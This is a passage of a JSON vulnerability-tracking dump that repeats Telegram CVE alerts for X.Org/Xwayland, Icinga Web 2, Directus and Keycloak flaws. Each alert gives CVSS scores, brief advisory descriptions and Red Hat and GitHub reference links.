CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A buffer overflow flaw was found in X.Org and Xwayland. The code in XkbVModMaskText() allocates a fixed-sized buffer on the stack and copies the names of the virtual modifiers to that buffer. The code fails to check the bounds of the buffer and would copy the data regardless of the size.\n\ud83d\udccf Published: 2025-02-25T15:54:06.708Z\n\ud83d\udccf Modified: 2025-03-27T04:19:56.000Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:2500\n2. https://access.redhat.com/errata/RHSA-2025:2502\n3. https://access.redhat.com/errata/RHSA-2025:2861\n4. https://access.redhat.com/errata/RHSA-2025:2862\n5. https://access.redhat.com/errata/RHSA-2025:2865\n6. https://access.redhat.com/errata/RHSA-2025:2866\n7. https://access.redhat.com/errata/RHSA-2025:2873\n8. https://access.redhat.com/errata/RHSA-2025:2874\n9. https://access.redhat.com/errata/RHSA-2025:2875\n10. https://access.redhat.com/errata/RHSA-2025:2879\n11. https://access.redhat.com/errata/RHSA-2025:2880\n12. https://access.redhat.com/security/cve/CVE-2025-26595\n13. https://bugzilla.redhat.com/show_bug.cgi?id=2345257", "creation_timestamp": "2025-03-27T04:25:58.000000Z"}, {"uuid": "91c2d50a-4295-4f2e-91bc-14b8a39c81f2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2862", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/9012", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-26595\n\ud83d\udd25 CVSS Score: 7.8 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A buffer overflow flaw was found in X.Org and Xwayland. The code in XkbVModMaskText() allocates a fixed-sized buffer on the stack and copies the names of the virtual modifiers to that buffer. The code fails to check the bounds of the buffer and would copy the data regardless of the size.\n\ud83d\udccf Published: 2025-02-25T15:54:06.708Z\n\ud83d\udccf Modified: 2025-03-27T04:19:56.000Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:2500\n2. https://access.redhat.com/errata/RHSA-2025:2502\n3. https://access.redhat.com/errata/RHSA-2025:2861\n4. https://access.redhat.com/errata/RHSA-2025:2862\n5. https://access.redhat.com/errata/RHSA-2025:2865\n6. https://access.redhat.com/errata/RHSA-2025:2866\n7. https://access.redhat.com/errata/RHSA-2025:2873\n8. https://access.redhat.com/errata/RHSA-2025:2874\n9. https://access.redhat.com/errata/RHSA-2025:2875\n10. https://access.redhat.com/errata/RHSA-2025:2879\n11. https://access.redhat.com/errata/RHSA-2025:2880\n12. https://access.redhat.com/security/cve/CVE-2025-26595\n13. https://bugzilla.redhat.com/show_bug.cgi?id=2345257", "creation_timestamp": "2025-03-27T04:25:58.000000Z"}, {"uuid": "2e2a3aea-62cc-4f51-803c-c6a80bae4e4f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2866", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/9012", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-26595\n\ud83d\udd25 CVSS Score: 7.8 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A buffer overflow flaw was found in X.Org and Xwayland. The code in XkbVModMaskText() allocates a fixed-sized buffer on the stack and copies the names of the virtual modifiers to that buffer. The code fails to check the bounds of the buffer and would copy the data regardless of the size.\n\ud83d\udccf Published: 2025-02-25T15:54:06.708Z\n\ud83d\udccf Modified: 2025-03-27T04:19:56.000Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:2500\n2. https://access.redhat.com/errata/RHSA-2025:2502\n3. https://access.redhat.com/errata/RHSA-2025:2861\n4. https://access.redhat.com/errata/RHSA-2025:2862\n5. https://access.redhat.com/errata/RHSA-2025:2865\n6. https://access.redhat.com/errata/RHSA-2025:2866\n7. https://access.redhat.com/errata/RHSA-2025:2873\n8. https://access.redhat.com/errata/RHSA-2025:2874\n9. https://access.redhat.com/errata/RHSA-2025:2875\n10. https://access.redhat.com/errata/RHSA-2025:2879\n11. https://access.redhat.com/errata/RHSA-2025:2880\n12. https://access.redhat.com/security/cve/CVE-2025-26595\n13. https://bugzilla.redhat.com/show_bug.cgi?id=2345257", "creation_timestamp": "2025-03-27T04:25:58.000000Z"}, {"uuid": "3b936ad5-c1ab-4354-83a0-4c92077e9770", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8R73-6686-WV8Q", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/8891", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-30164\n\ud83d\udd25 CVSS Score: 4.1 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:L/A:N)\n\ud83d\udd39 Description: Icinga Web 2 is an open source monitoring web interface, framework and command-line interface. A vulnerability in versions prior to 2.11.5 and 2.12.13 vulnerability allows an attacker to craft a URL that, once visited by an authenticated user (or one that is able to authenticate), allows to manipulate the backend to redirect the user to any location. This issue has been resolved in versions 2.11.5 and 2.12.3 of Icinga Web 2. No known workarounds are available.\n\ud83d\udccf Published: 2025-03-26T16:13:26.590Z\n\ud83d\udccf Modified: 2025-03-26T16:13:26.590Z\n\ud83d\udd17 References:\n1. https://github.com/Icinga/icingaweb2/security/advisories/GHSA-8r73-6686-wv8q\n2. https://github.com/Icinga/icingaweb2/releases/tag/v2.11.5\n3. https://github.com/Icinga/icingaweb2/releases/tag/v2.12.3", "creation_timestamp": "2025-03-26T16:25:25.000000Z"}, {"uuid": "f1c1ce2b-021a-42b6-922f-1040ea634700", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7QVQ-54VM-R7HX", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/8889", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-27406\n\ud83d\udd25 CVSS Score: 7.7 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:H)\n\ud83d\udd39 Description: Icinga Reporting is the central component for reporting related functionality in the monitoring web frontend and framework Icinga Web 2. A vulnerability present in versions 0.10.0 through 1.0.2 allows to set up a template that allows to embed arbitrary Javascript. This enables the attacker to act on behalf of the user, if the template is being previewed; and act on behalf of the headless browser, if a report using the template is printed to PDF. This issue has been resolved in version 1.0.3 of Icinga Reporting. As a workaround, review all templates and remove suspicious settings.\n\ud83d\udccf Published: 2025-03-26T15:49:45.273Z\n\ud83d\udccf Modified: 2025-03-26T16:15:22.593Z\n\ud83d\udd17 References:\n1. https://github.com/Icinga/icingaweb2-module-reporting/security/advisories/GHSA-7qvq-54vm-r7hx\n2. https://github.com/Icinga/icingaweb2-module-reporting/releases/tag/v1.0.3", "creation_timestamp": "2025-03-26T16:25:23.000000Z"}, {"uuid": "d740e46c-debf-4f9e-a2b3-e3b8e0154576", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2500", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/9012", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-26595\n\ud83d\udd25 CVSS Score: 7.8 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A buffer overflow flaw was found in X.Org and Xwayland. The code in XkbVModMaskText() allocates a fixed-sized buffer on the stack and copies the names of the virtual modifiers to that buffer. The code fails to check the bounds of the buffer and would copy the data regardless of the size.\n\ud83d\udccf Published: 2025-02-25T15:54:06.708Z\n\ud83d\udccf Modified: 2025-03-27T04:19:56.000Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:2500\n2. https://access.redhat.com/errata/RHSA-2025:2502\n3. https://access.redhat.com/errata/RHSA-2025:2861\n4. https://access.redhat.com/errata/RHSA-2025:2862\n5. https://access.redhat.com/errata/RHSA-2025:2865\n6. https://access.redhat.com/errata/RHSA-2025:2866\n7. https://access.redhat.com/errata/RHSA-2025:2873\n8. https://access.redhat.com/errata/RHSA-2025:2874\n9. https://access.redhat.com/errata/RHSA-2025:2875\n10. https://access.redhat.com/errata/RHSA-2025:2879\n11. https://access.redhat.com/errata/RHSA-2025:2880\n12. https://access.redhat.com/security/cve/CVE-2025-26595\n13. https://bugzilla.redhat.com/show_bug.cgi?id=2345257", "creation_timestamp": "2025-03-27T04:25:58.000000Z"}, {"uuid": "0e256f88-c69a-4938-9eda-fd9466828735", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-56P6-QW3C-FQ2G", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/8899", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-30351\n\ud83d\udd25 CVSS Score: 3.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:N)\n\ud83d\udd39 Description: Directus is a real-time API and App dashboard for managing SQL database content. Starting in version 10.10.0 and prior to version 11.5.0, a suspended user can use the token generated in session auth mode to access the API despite their status. This happens because there is a check missing in `verifySessionJWT` to verify that a user is actually still active and allowed to access the API. One can extract the session token obtained by, e.g. login in to the app while still active and then, after the user has been suspended continue to use that token until it expires. Version 11.5.0 patches the issue.\n\ud83d\udccf Published: 2025-03-26T17:13:42.096Z\n\ud83d\udccf Modified: 2025-03-26T17:13:42.096Z\n\ud83d\udd17 References:\n1. https://github.com/directus/directus/security/advisories/GHSA-56p6-qw3c-fq2g", "creation_timestamp": "2025-03-26T17:25:24.000000Z"}, {"uuid": "9099af1e-c7f1-47cd-adba-3d2978a3dc1b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2879", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/9006", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-26601\n\ud83d\udd25 CVSS Score: 7.8 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A use-after-free flaw was found in X.Org and Xwayland. When changing an alarm, the values of the change mask are evaluated one after the other, changing the trigger values as requested, and eventually, SyncInitTrigger() is called. If one of the changes triggers an error, the function will return early, not adding the new sync object, possibly causing a use-after-free when the alarm eventually triggers.\n\ud83d\udccf Published: 2025-02-25T15:55:36.775Z\n\ud83d\udccf Modified: 2025-03-27T04:22:08.108Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:2500\n2. https://access.redhat.com/errata/RHSA-2025:2502\n3. https://access.redhat.com/errata/RHSA-2025:2861\n4. https://access.redhat.com/errata/RHSA-2025:2862\n5. https://access.redhat.com/errata/RHSA-2025:2865\n6. https://access.redhat.com/errata/RHSA-2025:2866\n7. https://access.redhat.com/errata/RHSA-2025:2873\n8. https://access.redhat.com/errata/RHSA-2025:2874\n9. https://access.redhat.com/errata/RHSA-2025:2875\n10. https://access.redhat.com/errata/RHSA-2025:2879\n11. https://access.redhat.com/errata/RHSA-2025:2880\n12. https://access.redhat.com/security/cve/CVE-2025-26601\n13. https://bugzilla.redhat.com/show_bug.cgi?id=2345251", "creation_timestamp": "2025-03-27T04:25:50.000000Z"}, {"uuid": "7551aa83-2af3-49c0-9279-df6f9fbbbbea", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2862", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/9006", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-26601\n\ud83d\udd25 CVSS Score: 7.8 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A use-after-free flaw was found in X.Org and Xwayland. When changing an alarm, the values of the change mask are evaluated one after the other, changing the trigger values as requested, and eventually, SyncInitTrigger() is called. If one of the changes triggers an error, the function will return early, not adding the new sync object, possibly causing a use-after-free when the alarm eventually triggers.\n\ud83d\udccf Published: 2025-02-25T15:55:36.775Z\n\ud83d\udccf Modified: 2025-03-27T04:22:08.108Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:2500\n2. https://access.redhat.com/errata/RHSA-2025:2502\n3. https://access.redhat.com/errata/RHSA-2025:2861\n4. https://access.redhat.com/errata/RHSA-2025:2862\n5. https://access.redhat.com/errata/RHSA-2025:2865\n6. https://access.redhat.com/errata/RHSA-2025:2866\n7. https://access.redhat.com/errata/RHSA-2025:2873\n8. https://access.redhat.com/errata/RHSA-2025:2874\n9. https://access.redhat.com/errata/RHSA-2025:2875\n10. https://access.redhat.com/errata/RHSA-2025:2879\n11. https://access.redhat.com/errata/RHSA-2025:2880\n12. https://access.redhat.com/security/cve/CVE-2025-26601\n13. https://bugzilla.redhat.com/show_bug.cgi?id=2345251", "creation_timestamp": "2025-03-27T04:25:50.000000Z"}, {"uuid": "7307403a-071f-4914-9cb2-8615862d7242", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2502", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/9007", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-26600\n\ud83d\udd25 CVSS Score: 7.8 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A use-after-free flaw was found in X.Org and Xwayland. When a device is removed while still frozen, the events queued for that device remain while the device is freed. Replaying the events will cause a use-after-free.\n\ud83d\udccf Published: 2025-02-25T15:55:20.421Z\n\ud83d\udccf Modified: 2025-03-27T04:21:52.306Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:2500\n2. https://access.redhat.com/errata/RHSA-2025:2502\n3. https://access.redhat.com/errata/RHSA-2025:2861\n4. https://access.redhat.com/errata/RHSA-2025:2862\n5. https://access.redhat.com/errata/RHSA-2025:2865\n6. https://access.redhat.com/errata/RHSA-2025:2866\n7. https://access.redhat.com/errata/RHSA-2025:2873\n8. https://access.redhat.com/errata/RHSA-2025:2874\n9. https://access.redhat.com/errata/RHSA-2025:2875\n10. https://access.redhat.com/errata/RHSA-2025:2879\n11. https://access.redhat.com/errata/RHSA-2025:2880\n12. https://access.redhat.com/security/cve/CVE-2025-26600\n13. https://bugzilla.redhat.com/show_bug.cgi?id=2345252", "creation_timestamp": "2025-03-27T04:25:50.000000Z"}, {"uuid": "5049ec1d-6506-4b80-b33d-67a8e4dfbe37", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1860", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/8934", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-1249\n\ud83d\udd25 CVSS Score: 7.4 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:N/A:H)\n\ud83d\udd39 Description: A flaw was found in Keycloak's OIDC component in the \"checkLoginIframe,\" which allows unvalidated cross-origin messages. This flaw allows attackers to coordinate and send millions of requests in seconds using simple code, significantly impacting the application's availability without proper origin validation for incoming messages.\n\ud83d\udccf Published: 2024-04-17T13:22:48.335Z\n\ud83d\udccf Modified: 2025-03-26T19:24:12.590Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:1860\n2. https://access.redhat.com/errata/RHSA-2024:1861\n3. https://access.redhat.com/errata/RHSA-2024:1862\n4. https://access.redhat.com/errata/RHSA-2024:1864\n5. https://access.redhat.com/errata/RHSA-2024:1866\n6. https://access.redhat.com/errata/RHSA-2024:1867\n7. https://access.redhat.com/errata/RHSA-2024:1868\n8. https://access.redhat.com/errata/RHSA-2024:2945\n9. https://access.redhat.com/errata/RHSA-2024:4057\n10. https://access.redhat.com/security/cve/CVE-2024-1249\n11. https://bugzilla.redhat.com/show_bug.cgi?id=2262918", "creation_timestamp": "2025-03-26T19:26:07.000000Z"}, {"uuid": "6d0c7aae-1374-48b0-b2bb-3857698a29a6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:4057", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/8934", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-1249\n\ud83d\udd25 CVSS Score: 7.4 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:N/A:H)\n\ud83d\udd39 Description: A flaw was found in Keycloak's OIDC component in the \"checkLoginIframe,\" which allows unvalidated cross-origin messages. This flaw allows attackers to coordinate and send millions of requests in seconds using simple code, significantly impacting the application's availability without proper origin validation for incoming messages.\n\ud83d\udccf Published: 2024-04-17T13:22:48.335Z\n\ud83d\udccf Modified: 2025-03-26T19:24:12.590Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:1860\n2. https://access.redhat.com/errata/RHSA-2024:1861\n3. https://access.redhat.com/errata/RHSA-2024:1862\n4. https://access.redhat.com/errata/RHSA-2024:1864\n5. https://access.redhat.com/errata/RHSA-2024:1866\n6. https://access.redhat.com/errata/RHSA-2024:1867\n7. https://access.redhat.com/errata/RHSA-2024:1868\n8. https://access.redhat.com/errata/RHSA-2024:2945\n9. https://access.redhat.com/errata/RHSA-2024:4057\n10. https://access.redhat.com/security/cve/CVE-2024-1249\n11. https://bugzilla.redhat.com/show_bug.cgi?id=2262918", "creation_timestamp": "2025-03-26T19:26:07.000000Z"}, {"uuid": "a3f97ec3-4da6-477f-b948-52bdc2e954ab", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:2945", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/8934", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-1249\n\ud83d\udd25 CVSS Score: 7.4 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:N/A:H)\n\ud83d\udd39 Description: A flaw was found in Keycloak's OIDC component in the \"checkLoginIframe,\" which allows unvalidated cross-origin messages. This flaw allows attackers to coordinate and send millions of requests in seconds using simple code, significantly impacting the application's availability without proper origin validation for incoming messages.\n\ud83d\udccf Published: 2024-04-17T13:22:48.335Z\n\ud83d\udccf Modified: 2025-03-26T19:24:12.590Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:1860\n2. https://access.redhat.com/errata/RHSA-2024:1861\n3. https://access.redhat.com/errata/RHSA-2024:1862\n4. https://access.redhat.com/errata/RHSA-2024:1864\n5. https://access.redhat.com/errata/RHSA-2024:1866\n6. https://access.redhat.com/errata/RHSA-2024:1867\n7. https://access.redhat.com/errata/RHSA-2024:1868\n8. https://access.redhat.com/errata/RHSA-2024:2945\n9. https://access.redhat.com/errata/RHSA-2024:4057\n10. https://access.redhat.com/security/cve/CVE-2024-1249\n11. https://bugzilla.redhat.com/show_bug.cgi?id=2262918", "creation_timestamp": "2025-03-26T19:26:07.000000Z"}, {"uuid": "43ce6e35-ec43-4269-b444-ec187f9ca808", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1861", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/8934", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-1249\n\ud83d\udd25 CVSS Score: 7.4 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:N/A:H)\n\ud83d\udd39 Description: A flaw was found in Keycloak's OIDC component in the \"checkLoginIframe,\" which allows unvalidated cross-origin messages. This flaw allows attackers to coordinate and send millions of requests in seconds using simple code, significantly impacting the application's availability without proper origin validation for incoming messages.\n\ud83d\udccf Published: 2024-04-17T13:22:48.335Z\n\ud83d\udccf Modified: 2025-03-26T19:24:12.590Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:1860\n2. https://access.redhat.com/errata/RHSA-2024:1861\n3. https://access.redhat.com/errata/RHSA-2024:1862\n4. https://access.redhat.com/errata/RHSA-2024:1864\n5. https://access.redhat.com/errata/RHSA-2024:1866\n6. https://access.redhat.com/errata/RHSA-2024:1867\n7. https://access.redhat.com/errata/RHSA-2024:1868\n8. https://access.redhat.com/errata/RHSA-2024:2945\n9. https://access.redhat.com/errata/RHSA-2024:4057\n10. https://access.redhat.com/security/cve/CVE-2024-1249\n11. https://bugzilla.redhat.com/show_bug.cgi?id=2262918", "creation_timestamp": "2025-03-26T19:26:07.000000Z"}, {"uuid": "4ea9fa09-231b-47d1-8ace-6c6ea1e53ab4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1862", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/8934", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-1249\n\ud83d\udd25 CVSS Score: 7.4 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:N/A:H)\n\ud83d\udd39 Description: A flaw was found in Keycloak's OIDC component in the \"checkLoginIframe,\" which allows unvalidated cross-origin messages. This flaw allows attackers to coordinate and send millions of requests in seconds using simple code, significantly impacting the application's availability without proper origin validation for incoming messages.\n\ud83d\udccf Published: 2024-04-17T13:22:48.335Z\n\ud83d\udccf Modified: 2025-03-26T19:24:12.590Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:1860\n2. https://access.redhat.com/errata/RHSA-2024:1861\n3. https://access.redhat.com/errata/RHSA-2024:1862\n4. https://access.redhat.com/errata/RHSA-2024:1864\n5. https://access.redhat.com/errata/RHSA-2024:1866\n6. https://access.redhat.com/errata/RHSA-2024:1867\n7. https://access.redhat.com/errata/RHSA-2024:1868\n8. https://access.redhat.com/errata/RHSA-2024:2945\n9. https://access.redhat.com/errata/RHSA-2024:4057\n10. https://access.redhat.com/security/cve/CVE-2024-1249\n11. https://bugzilla.redhat.com/show_bug.cgi?id=2262918", "creation_timestamp": "2025-03-26T19:26:07.000000Z"}, {"uuid": "078ce916-37af-4827-ad12-66048c2530ed", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2875", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/9006", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-26601\n\ud83d\udd25 CVSS Score: 7.8 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A use-after-free flaw was found in X.Org and Xwayland. When changing an alarm, the values of the change mask are evaluated one after the other, changing the trigger values as requested, and eventually, SyncInitTrigger() is called. If one of the changes triggers an error, the function will return early, not adding the new sync object, possibly causing a use-after-free when the alarm eventually triggers.\n\ud83d\udccf Published: 2025-02-25T15:55:36.775Z\n\ud83d\udccf Modified: 2025-03-27T04:22:08.108Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:2500\n2. https://access.redhat.com/errata/RHSA-2025:2502\n3. https://access.redhat.com/errata/RHSA-2025:2861\n4. https://access.redhat.com/errata/RHSA-2025:2862\n5. https://access.redhat.com/errata/RHSA-2025:2865\n6. https://access.redhat.com/errata/RHSA-2025:2866\n7. https://access.redhat.com/errata/RHSA-2025:2873\n8. https://access.redhat.com/errata/RHSA-2025:2874\n9. https://access.redhat.com/errata/RHSA-2025:2875\n10. https://access.redhat.com/errata/RHSA-2025:2879\n11. https://access.redhat.com/errata/RHSA-2025:2880\n12. https://access.redhat.com/security/cve/CVE-2025-26601\n13. https://bugzilla.redhat.com/show_bug.cgi?id=2345251", "creation_timestamp": "2025-03-27T04:25:50.000000Z"}, {"uuid": "e3a30b93-b5c5-40d3-910b-52f081b1bbca", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2861", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/9006", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-26601\n\ud83d\udd25 CVSS Score: 7.8 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A use-after-free flaw was found in X.Org and Xwayland. When changing an alarm, the values of the change mask are evaluated one after the other, changing the trigger values as requested, and eventually, SyncInitTrigger() is called. If one of the changes triggers an error, the function will return early, not adding the new sync object, possibly causing a use-after-free when the alarm eventually triggers.\n\ud83d\udccf Published: 2025-02-25T15:55:36.775Z\n\ud83d\udccf Modified: 2025-03-27T04:22:08.108Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:2500\n2. https://access.redhat.com/errata/RHSA-2025:2502\n3. https://access.redhat.com/errata/RHSA-2025:2861\n4. https://access.redhat.com/errata/RHSA-2025:2862\n5. https://access.redhat.com/errata/RHSA-2025:2865\n6. https://access.redhat.com/errata/RHSA-2025:2866\n7. https://access.redhat.com/errata/RHSA-2025:2873\n8. https://access.redhat.com/errata/RHSA-2025:2874\n9. https://access.redhat.com/errata/RHSA-2025:2875\n10. https://access.redhat.com/errata/RHSA-2025:2879\n11. https://access.redhat.com/errata/RHSA-2025:2880\n12. https://access.redhat.com/security/cve/CVE-2025-26601\n13. https://bugzilla.redhat.com/show_bug.cgi?id=2345251", "creation_timestamp": "2025-03-27T04:25:50.000000Z"}, {"uuid": "5c48437d-ca92-4ade-a18a-a8b35a939c6d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2873", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/9008", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-26599\n\ud83d\udd25 CVSS Score: 7.8 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: An access to an uninitialized pointer flaw was found in X.Org and Xwayland. The function compCheckRedirect() may fail if it cannot allocate the backing pixmap. In that case, compRedirectWindow() will return a BadAlloc error without validating the window tree marked just before, which leaves the validated data partly initialized and the use of an uninitialized pointer later.\n\ud83d\udccf Published: 2025-02-25T15:55:02.964Z\n\ud83d\udccf Modified: 2025-03-27T04:21:07.505Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:2500\n2. https://access.redhat.com/errata/RHSA-2025:2502\n3. https://access.redhat.com/errata/RHSA-2025:2861\n4. https://access.redhat.com/errata/RHSA-2025:2862\n5. https://access.redhat.com/errata/RHSA-2025:2865\n6. https://access.redhat.com/errata/RHSA-2025:2866\n7. https://access.redhat.com/errata/RHSA-2025:2873\n8. https://access.redhat.com/errata/RHSA-2025:2874\n9. https://access.redhat.com/errata/RHSA-2025:2875\n10. https://access.redhat.com/errata/RHSA-2025:2879\n11. https://access.redhat.com/errata/RHSA-2025:2880\n12. https://access.redhat.com/security/cve/CVE-2025-26599\n13. https://bugzilla.redhat.com/show_bug.cgi?id=2345253", "creation_timestamp": "2025-03-27T04:25:51.000000Z"}, {"uuid": 